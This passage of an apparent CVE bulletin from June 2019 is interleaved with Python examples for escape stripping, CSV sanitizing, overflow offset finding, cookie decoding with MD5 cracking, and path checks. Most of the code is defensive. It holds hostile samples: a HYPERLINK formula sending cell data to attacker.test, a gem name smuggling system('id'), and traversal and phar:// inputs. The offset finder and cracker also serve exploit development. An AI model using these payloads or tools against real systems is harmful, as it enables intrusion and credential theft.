CONFIRM php — php When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash. 2019-06-18 6.4 CVE-2019-11040
CONFIRM radare — radare2 In radare2 through 3.5.1, cmd_mount in libr/core/cmd_mount.c has a double free for the ms command. 2019-06-17 4.3 CVE-2019-12865
MISC ranksol — live_call_support CSRF exists in server.php in Live Call Support Application 1.5 for adding an admin account. 2019-06-19 6.8 CVE-2018-17389
MISC
MISC ranksol — nimble_professional CSRF exists in Nimble Messaging Bulk SMS Marketing Application 1.0 for adding an admin account. 2019-06-19 6.8 CVE-2018-17387
MISC
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::UserInteraction#verbose calls say without escaping, escape sequence injection is possible. 2019-06-17 5.0 CVE-2019-8321
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur. 2019-06-17 5.0 CVE-2019-8322
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur. 2019-06-17 5.0 CVE-2019-8323
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check. 2019-06-17 6.8 CVE-2019-8324
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.) 2019-06-17 5.0 CVE-2019-8325
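The five RubyGems entries above are two variants of one problem: text that the gem client did not produce itself (an API response, a gem name, an error message) is written to the terminal or spliced into the one-line gemspec stub without being checked for bytes the terminal or the Ruby parser will interpret. The following is an added example of the two defensive filters, written in Python rather than Ruby and not taken from RubyGems: a terminal-escape stripper for untrusted output, and a single-token check for gem names. The escape-sequence grammar follows ECMA-48; the gem name character set is an assumption made for the example.

```python
import re

# Sequences a terminal would act on, tried in this order: CSI (colours, cursor
# movement, screen clear), OSC (window title, hyperlinks), the remaining
# two-byte ESC sequences, and finally bare C0 control bytes and DEL.
# Tab and newline are deliberately kept: they are formatting, not commands.
_TERMINAL_CONTROL = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"             # CSI: ESC [ params intermediates final
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"  # OSC: ESC ] ... terminated by BEL or ESC \
    r"|\x1b[\x40-\x5f]"                    # other Fe sequences: ESC @ .. ESC _
    r"|[\x00-\x08\x0b-\x1f\x7f]"           # remaining C0 controls and DEL
)


def strip_terminal_escapes(text: str) -> str:
    """Remove everything a terminal would interpret from untrusted text
    before echoing it with say/alert_error-style helpers."""
    return _TERMINAL_CONTROL.sub("", text)


def make_visible(text: str) -> str:
    """Alternative policy: keep the bytes but render them as \\xNN, so the
    person reading the output can see that the server sent an escape."""
    return "".join(
        ch if (0x20 <= ord(ch) < 0x7F or ch in "\t\n") else f"\\x{ord(ch):02x}"
        for ch in text
    )


# A gem name must be a single token. Anything with a newline, quote or
# other punctuation cannot be spliced into the one-line stub that is
# later eval-ed. (Character set assumed for the example.)
_GEM_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$")


def valid_gem_name(name: str) -> bool:
    return _GEM_NAME.match(name) is not None


if __name__ == "__main__":
    # Constructed samples: a crafted API response and a multi-line gem name.
    crafted_response = "\x1b[2J\x1b]0;owned\x07Owner added: \x1b[31mroot\x1b[0m\n"
    print(repr(strip_terminal_escapes(crafted_response)))
    print(make_visible(crafted_response))
    print(valid_gem_name("rake"), valid_gem_name("rake\nsystem('id')"))
```

Use the stripping form for anything written to a TTY and the visible form for logs, where evidence of the attempt matters. The gem-name check must run before the name is interpolated into any generated Ruby, not after.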
MISC sahipro — sahi_pro An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A web reports module has “export to excel features” that are vulnerable to CSV injection. An attacker can embed Excel formulas inside an automation script that, when exported after execution, results in code execution. 2019-06-17 6.8 CVE-2018-20468
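The Sahi Pro CSV injection entry above describes the usual shape of the bug: a value written by one user (here, inside an automation script) is exported into a spreadsheet where a leading =, +, -, @ or tab turns the cell into a formula. The following is an added example of a hardened export routine, not Sahi Pro's code; the report columns and rows are constructed for the example and the OWASP apostrophe-prefix mitigation is used.

```python
import csv
import io

# A cell beginning with one of these (after the whitespace spreadsheets trim)
# is evaluated as a formula by Excel, LibreOffice and Google Sheets.
_FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def csv_safe_cell(value) -> str:
    """Neutralise formula injection for one exported cell.

    Genuine numbers pass through unchanged (so a negative result column is
    not mangled); any string whose first non-blank character is a trigger
    gets a leading apostrophe, which forces the cell to be read as text.
    """
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value)
    stripped = text.lstrip(" \t\r\n")
    if stripped and stripped[0] in _FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_rows(rows, header) -> str:
    """Render a report as CSV with every cell quoted and neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([csv_safe_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed report rows. The second one carries a formula in the "step"
# column, as an author of an automation script could plant it; the third
# shows the false positive the apostrophe rule accepts for text values.
SAMPLE_HEADER = ("name", "step", "result")
SAMPLE_ROWS = [
    ("login_test", "_click(_button('Sign in'))", "passed"),
    ("evil_test", '=HYPERLINK("http://attacker.test/?"&A1,"open")', "passed"),
    ("neg_test", "-1 offset", "failed"),
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS, SAMPLE_HEADER))
```

Quoting alone is not enough: spreadsheet importers strip the CSV quotes before deciding whether a cell is a formula, so the apostrophe has to be part of the cell content. The remaining caveat is that text columns legitimately starting with a dash or plus sign will show the apostrophe in some viewers; exempting typed numbers, as above, removes the common case.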
MISC sahipro — sahi_pro An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. 2019-06-17 4.3 CVE-2018-20472
MISC
MISC samba — samba Samba 4.9.x before 4.9.9 and 4.10.x before 4.10.5 has a NULL pointer dereference, leading to Denial of Service. This is related to the AD DC DNS management server (dnsserver) RPC server process. 2019-06-19 4.0 CVE-2019-12435
BID
UBUNTU
CONFIRM samba — samba Samba 4.10.x before 4.10.5 has a NULL pointer dereference, leading to an AD DC LDAP server Denial of Service. This is related to an attacker using the paged search control. The attacker must have directory read access in order to attempt an exploit. 2019-06-19 4.0 CVE-2019-12436
BID
UBUNTU
CONFIRM securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of setting a name for the wireless network. These values are stored by the device in NVRAM (Non-volatile RAM). It seems that the POST parameters passed in this request to set up names on the device do not have a string length check on them. This allows an attacker to send a large payload in the “mssid_1” POST parameter. The device also allows a user to view the name of the Wifi Network set by the user. While processing this request, the device calls a function at address 0x00412CE4 (routerSummary) in the binary “webServer” located in Almond folder, which retrieves the value set earlier by “mssid_1” parameter as SSID2 and this value then results in overflowing the stack set up for this function and allows an attacker to control $ra register value on the stack which allows an attacker to control the device by executing a payload of an attacker’s choice. If the firmware version AL-R096 is dissected using binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that receives the values sent by the POST request. If we open this binary in IDA-pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA pro is identified to be receiving the values sent in the POST parameter “mssid_1” at address 0x0042BA00 and then sets in the NVRAM at address 0x0042C314. The value is later retrieved in the function at address 0x00412EAC and this results in overflowing the buffer as the function copies the value directly on the stack. 2019-06-18 4.6 CVE-2017-8329
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of adding new port forwarding rules to the device. It seems that the POST parameters passed in this request to set up routes on the device can be set in such a way that would result in passing commands to a “system” API in the function and thus result in command injection on the device. If the firmware version AL-R096 is dissected using the binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that receives the values sent by the POST request. If we open this binary in IDA Pro we will notice that this follows a MIPS little endian format. The function sub_43C280 in IDA Pro is identified to be receiving the values sent in the POST request and the value set in POST parameter “ip_address” is extracted at address 0x0043C2F0. The POST parameter “ipaddress” is concatenated at address 0x0043C958 and this is passed to a “system” function at address 0x00437284. This allows an attacker to provide the payload of his/her choice and finally take control of the device. 2019-06-18 6.5 CVE-2017-8331
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of blocking keywords in web traffic, using the web management interface, to prevent kids from watching content that might be deemed unsafe. It seems that the device does not implement any cross-site scripting protection mechanism, which allows an attacker to trick a user who is logged in to the web management interface into executing a stored cross-site scripting payload in the user’s browser and so execute any action on the device provided by the web management interface. 2019-06-18 6.5 CVE-2017-8332
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of blocking IP addresses using the web management interface. It seems that the device does not implement any cross-site request forgery protection mechanism, which allows an attacker to trick a user who is logged in to the web management interface into submitting a forged request from the user’s browser and so execute any action on the device provided by the web management interface. 2019-06-18 6.0 CVE-2017-8334
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of setting a name for the wireless network. These values are stored by the device in NVRAM (Non-volatile RAM). It seems that the POST parameters passed in this request to set up names on the device do not have a string length check on them. This allows an attacker to send a large payload in the “mssid_1” POST parameter. The device also allows a user to view the name of the Wifi Network set by the user. While processing this request, the device calls a function named “getCfgToHTML” at address 0x004268A8 which retrieves the value set earlier by the “mssid_1” parameter as SSID2, and this value then results in overflowing the stack set up for this function and allows an attacker to control the $ra register value on the stack, which allows an attacker to control the device by executing a payload of an attacker’s choice. If the firmware version AL-R096 is dissected using the binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that receives the values sent by the POST request. If we open this binary in IDA Pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA Pro is identified to be receiving the values sent in the POST parameter “mssid_1” at address 0x0042BA00 and then sets them in the NVRAM at address 0x0042C314. The value is later retrieved in the function “getCfgToHTML” at address 0x00426924 and this results in overflowing the buffer due to the “strcat” function that is utilized by this function. 2019-06-18 6.0 CVE-2017-8335
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of adding new routes to the device. It seems that the POST parameters passed in this request to set up routes on the device can be set in such a way that would result in overflowing the stack set up and allow an attacker to control the $ra register stored on the stack. If the firmware version AL-R096 is dissected using the binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that receives the values sent by the POST request. If we open this binary in IDA Pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA Pro is identified to be receiving the values sent in the POST request. The POST parameter “gateway” allows an attacker to overflow the stack and control the $ra register after 1546 characters. The value from this POST parameter is copied onto the stack at address 0x00421348. This allows an attacker to provide the payload of his/her choice and finally take control of the device. 2019-06-18 6.5 CVE-2017-8336
MISC
MISC
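The three Almond stack-overflow entries above (mssid_1 via routerSummary and getCfgToHTML, and gateway with $ra controlled after 1546 characters) are all triaged the same way: send a non-repeating pattern instead of a run of identical bytes, read the value the crash leaves in $ra, and map it back to the offset in the input. The following is an added example of that crash-triage step as a practitioner would script it; it is not the reporter's code, the figure 1546 is taken from the entry above, and the "captured" register value is constructed in the script rather than read from a real device.

```python
import string
import struct


def cyclic_pattern(length: int) -> str:
    """Metasploit-style pattern 'Aa0Aa1Aa2...Ab0...'.

    Every 4-byte window, at any alignment, is unique within the first 20280
    bytes, so a 32-bit register value recovered from a crash maps back to
    exactly one offset in the input that was sent.
    """
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def find_offset(pattern: str, register_value: int, little_endian: bool = True) -> int:
    """Return the input offset whose bytes ended up in a 32-bit register.

    The Almond's goahead binary is MIPS little-endian (per the entries
    above), so the register holds the four pattern bytes in reverse order;
    packing the value back with '<I' restores them. Returns -1 if the value
    did not come from the pattern (for instance, the overflow stopped short).
    """
    fmt = "<I" if little_endian else ">I"
    needle = struct.pack(fmt, register_value).decode("ascii", errors="replace")
    return pattern.find(needle)


def simulated_ra_capture(pattern: str, overwrite_at: int) -> int:
    """Constructed stand-in for the debugger readout: pretend the saved $ra
    slot was overwritten with the pattern bytes starting at overwrite_at."""
    slot = pattern[overwrite_at:overwrite_at + 4].encode("ascii")
    return struct.unpack("<I", slot)[0]


if __name__ == "__main__":
    payload = cyclic_pattern(2048)          # longer than the 1546 the entry cites
    ra = simulated_ra_capture(payload, 1546)
    print(f"$ra = 0x{ra:08x} -> offset {find_offset(payload, ra)}")
```

The only device-specific input is the register value; everything else is the same for any MIPS, ARM or x86 target. When `find_offset` returns -1, the crash did not land inside the pattern, which usually means the copy is length-limited or the register came from somewhere other than the overwritten frame.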
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of executing various actions on the web management interface. It seems that the device does not implement any Origin header check, which allows an attacker who can trick a user into navigating to an attacker’s webpage to exploit this issue and brute force the password for the web management interface. It also allows an attacker to then execute any other action, including management of rules and of sensors attached to the device, using WebSocket requests. 2019-06-18 6.8 CVE-2017-8337
MISC
MISC
BUGTRAQ seeddms — seeddms SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940. 2019-06-20 6.0 CVE-2019-12744
MISC
CONFIRM seeddms — seeddms out/out.GroupMgr.php in SeedDMS 5.1.11 has Stored XSS by making a new group with a JavaScript payload as the “GROUP” Name. 2019-06-17 4.3 CVE-2019-12801
MISC teltonika — rut950_firmware An issue was discovered on Teltonika RTU950 R_31.04.89 devices. The application allows a user to log in without limitation. For every successful login request, the application saves a session. A user can log in again without logging out, causing the application to store another session in memory. Exploitation of this vulnerability will increase memory use and consume free space. 2019-06-19 6.8 CVE-2018-19878
MISC
MISC tp-link — tl-wr1043nd_firmware An issue was discovered on TP-Link TL-WR1043ND V2 devices. The credentials can be easily decoded and cracked by brute-force, WordList, or Rainbow Table attacks. Specifically, credentials in the “Authorization” cookie are encoded with URL encoding and base64, leading to easy decoding. Also, the username is cleartext, and the password is hashed with the MD5 algorithm (after decoding of the URL encoded string with base64). 2019-06-19 5.0 CVE-2019-6972
MISC
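The TP-Link entry above describes a cookie that only looks opaque: URL encoding and base64 are both reversible, the username is cleartext inside, and the password is an unsalted MD5 that a wordlist pass recovers directly. The following is an added example that decodes such a cookie and runs the dictionary pass; it is not TP-Link's code, and the "Basic " prefix, the user:hash layout and the four-word list are assumptions constructed for the example.

```python
import base64
import hashlib
import urllib.parse


def decode_authorization_cookie(cookie_value: str):
    """Undo the two reversible layers named in the entry, URL encoding then
    base64, and split the assumed 'user:md5hex' payload.

    Returns (username, md5_hex_lowercase). Raises ValueError if the payload
    does not have that shape, so callers do not mistake a session token for
    an encoded credential.
    """
    raw = urllib.parse.unquote(cookie_value)
    if raw.startswith("Basic "):               # assumed prefix
        raw = raw[len("Basic "):]
    decoded = base64.b64decode(raw).decode("ascii")
    user, sep, digest = decoded.partition(":")
    digest = digest.lower()
    if not sep or len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("payload is not user:md5hex")
    return user, digest


def crack_md5(digest_hex: str, wordlist):
    """Unsalted MD5 costs one hash per candidate; no rainbow table needed
    for a list this small. Returns the matching word or None."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == digest_hex:
            return candidate
    return None


def build_cookie(user: str, password: str) -> str:
    """How a client would produce the cookie under the assumed layout;
    used here only to construct sample input."""
    payload = f"{user}:{hashlib.md5(password.encode()).hexdigest()}"
    return urllib.parse.quote("Basic " + base64.b64encode(payload.encode()).decode())


# Constructed wordlist for the example, not a real password list.
WORDLIST = ["123456", "password", "admin", "letmein"]

if __name__ == "__main__":
    cookie = build_cookie("admin", "admin")
    user, digest = decode_authorization_cookie(cookie)
    print(f"cookie={cookie}\nuser={user} md5={digest} password={crack_md5(digest, WORDLIST)}")
```

The fix is not a stronger encoding of the same data: a cookie should carry a random session identifier that maps to server-side state, and any stored password verifier should use a salted, slow hash so that a captured value cannot be turned back into the password.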
MISC tubigan — welcome_to_our_resort The Tubigan “Welcome to our Resort” 1.0 software allows CSRF via admin/mod_users/controller.php?action=edit. 2019-06-18 6.8 CVE-2018-18802
MISC
MISC twistedmatrix — twisted In words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections. 2019-06-16 5.8 CVE-2019-12855
MISC
MISC urbackup — urbackup In UrBackup 2.2.6, an attacker can send a malformed request to the client over the network, and trigger a fileservplugin/CClientThread.cpp CClientThread::ProcessPacket metadata_id!=0 assertion, leading to shutting down the client application. 2019-06-18 5.0 CVE-2018-20013
MISC
MISC znc — znc Modules.cpp in ZNC before 1.7.4-rc1 allows remote authenticated non-admin users to escalate privileges and execute arbitrary code by loading a module with a crafted name. 2019-06-15 6.5 CVE-2019-12816
CONFIRM
CONFIRM
MLIST
BUGTRAQ zrlog — zrlog An issue was discovered in ZRLOG 2.0.1. There is a Stored XSS vulnerability in the nickname field of the comment area. 2019-06-19 4.3 CVE-2018-17079
MISC
MISC zucchetti — hr_portal Zucchetti HR Portal through 2019-03-15 allows Directory Traversal. Unauthenticated users can escape outside of the restricted location (dot-dot-slash notation) to access files or directories that are elsewhere on the system. Through this vulnerability it is possible to read the application’s Java sources from /WEB-INF/classes/*.class. 2019-06-19 5.0 CVE-2019-10257
MISC
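The Zucchetti directory traversal entry above and the MISP entry earlier on this page (file_exists on a user-controlled value that accepts phar:// URLs) are two faces of one missing check: a user-supplied path is handed to a filesystem API before anyone confirms it names a plain file under the intended directory. The following is an added example of that check, written in Python and not taken from either project; PHP's stream wrappers have no Python equivalent, so the scheme rejection here is a generic rule (anything of the form scheme: is refused), and the base directory is an assumed deployment path.

```python
import os
import re

# Anything that looks like a URL or stream-wrapper prefix: phar:, php:, file:,
# data:, and also a Windows drive letter. Plain filenames never contain ':'.
_SCHEME_PREFIX = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")

BASE_DIR = "/srv/app/public"   # assumed deployment path for the example


def resolve_under_base(base_dir: str, user_path: str) -> str:
    """Return an absolute path guaranteed to lie inside base_dir, or raise
    ValueError. Call this before os.path.exists(), open() or any equivalent.

    Rejections, in order:
      1. NUL bytes, which truncate the path in C-backed APIs;
      2. scheme-prefixed values (phar://..., php://..., C:\\...);
      3. absolute paths, which would ignore base_dir entirely;
      4. any result that escapes base_dir once '..' and symlinks are resolved.
    """
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if _SCHEME_PREFIX.match(user_path):
        raise ValueError("scheme-prefixed path not allowed")
    if os.path.isabs(user_path):
        raise ValueError("absolute path not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath works on resolved, normalised paths, so 'a/../..' and
    # symlink escapes are both caught here.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


def safe_exists(base_dir: str, user_path: str) -> bool:
    """The file_exists() pattern from the MISP entry, done in the safe order:
    validate first, then ask the filesystem."""
    return os.path.exists(resolve_under_base(base_dir, user_path))


def rejects(base_dir: str, user_path: str) -> bool:
    """True if resolve_under_base refuses the path (used by the checks below)."""
    try:
        resolve_under_base(base_dir, user_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a normal upload name, the WEB-INF traversal from the
    # Zucchetti entry, a phar:// wrapper as in the MISP entry, and an absolute path.
    for p in ("uploads/report.pdf", "../../WEB-INF/classes/Login.class",
              "phar://evil.phar/x", "/etc/passwd"):
        print(f"{p!r:45} -> {'rejected' if rejects(BASE_DIR, p) else resolve_under_base(BASE_DIR, p)}")
```

Two details matter in practice: the base directory itself is resolved through realpath so that a symlinked base does not defeat the comparison, and the comparison is on path components (commonpath), not on a string prefix, so /srv/app/public-old does not pass as being under /srv/app/public.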